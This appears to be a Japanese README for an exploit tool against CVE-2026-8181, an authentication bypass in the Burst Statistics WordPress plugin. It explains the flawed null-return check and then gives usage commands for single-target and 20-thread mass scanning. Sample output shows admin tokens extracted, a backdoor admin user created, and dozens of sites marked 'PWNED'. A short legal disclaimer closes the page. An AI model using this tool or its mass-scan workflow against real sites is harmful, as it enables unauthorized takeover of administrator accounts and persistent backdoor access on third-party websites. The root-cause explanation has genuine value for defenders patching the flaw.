
CVE-2026-8181 | Burst Statistics 3.4.0 - 3.4.1.1 - 認証バイパスによる管理者アカウント乗っ取り
Burst Statistics | 認証バイパスによる管理者アカウント乗っ取り
Burst Statistics 3.4.0 - 3.4.1.1 - 認証バイパスによる管理者アカウント乗っ取り
WordPress用プラグイン「Burst Statistics – Privacy-Friendly WordPress Analytics (Google Analytics Alternative)」は、バージョン3.4.0から3.4.1.1において認証バイパスの脆弱性の影響を受けます。これは、Authorizationヘッダーからのアプリケーションパスワードを検証する際の is_mainwp_authenticated() 関数における戻り値の処理ミスが原因です。この関数は wp_authenticate_application_password(null, $username, $password) を呼び出しますが、対象ユーザーにアプリケーションパスワードが設定されていない場合、この関数は WP_Error ではなく null を返します。コードは is_wp_error() のみをチェックするため、wp_set_current_user() の呼び出しに進み、攻撃者に対してリクエスト全体で完全な管理者権限を付与します。
このバイパスは、プラグインのブートストラップ内の has_admin_access() を介して plugins_loaded(優先度9)中にトリガーされます。つまり、ユーザーのなりすましはWordPress REST APIがルートをディスパッチする前に発生し、管理者としてすべてのWPコアエンドポイント(/wp/v2/users、/wp/v2/users/me など)へのアクセスが可能になります。
これにより、認証されていない攻撃者が管理者のユーザー名を知っている場合、任意のランダムなBasic認証パスワードを指定することでその管理者になりすまし、完全な権限昇格と管理者アカウントの乗っ取りを達成できます。
~ CVSSスコア: 9.8(緊急)
~ CVSSベクター: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
~ 影響を受けるバージョン: 3.4.0 - 3.4.1.1
~ パッチ適用済みバージョン: 3.4.2
単一ターゲット :
python3 shadow.py -u https://target.comユーザー名が判明している単一ターゲット :
python3 shadow.py -u https://target.com -U admin複数ターゲット(一括スキャン) :
python3 shadow.py -f targets.txt -t 20対話モード :
python3 shadow.py/burst/v1/mainwp-auth)
╔══════════════════════════════════════════════════════╗
║ 🔥 CVE-2026-8181 Burst Statistics Auth Bypass ║
║ 👩💻 Friska & Shadow | Route Check | Full Fallback ║
║ 🎯 3.4.0-3.4.1.1 | CVSS 9.8 | Triple Output ║
╚══════════════════════════════════════════════════════╝
[*] [HTTP] http://target.com
[+] Burst Statistics version: 3.4.0
[+] Burst mainwp-auth route alive!
[*] Testing 2 user(s): admin, editor
[*] Trying bypass on: admin (id=1)
[+] BYPASS SUCCESS → admin (id=1, admin=True)
[+] Application Password token extracted!
[💀] USER CREATED: shadow / R4nd0mP@ss!
[💀] TAKEOVER VERIFIED via wp-login.php!
[💀] SUCCESS! http://target.com/wp-admin/
⚡ MASS SCAN: 50 targets | 20 threads
────────────────────────────────────────────────────────────
[💀] [1/50] http://target1.com → PWNED!
[💀] [2/50] http://target2.com → PWNED!
[☠️] [3/50] http://target3.com → DEAD
[-] [4/50] http://target4.com → SECURED
[!] [5/50] http://target5.com → PATCHED
────────────────────────────────────────────────────────────
╔══════════════════════════════════╗
║ 📊 SCAN SUMMARY ║
╠══════════════════════════════════╣
║ 💀 PWNED: 12 ║
║ ☠️ DEAD: 8 ║
║ 🔒 SECURED: 5 ║
║ ⚠️ PATCHED: 15 ║
║ ❌ FAILED: 10 ║
╠══════════════════════════════════╣
║ Total: 50 ║
╚══════════════════════════════════╝
[+] 📁 user.txt | token.txt | new-user-and-header.txt
自分が所有していない、またはテスト許可を得ていないシステムへの不正使用は違法です。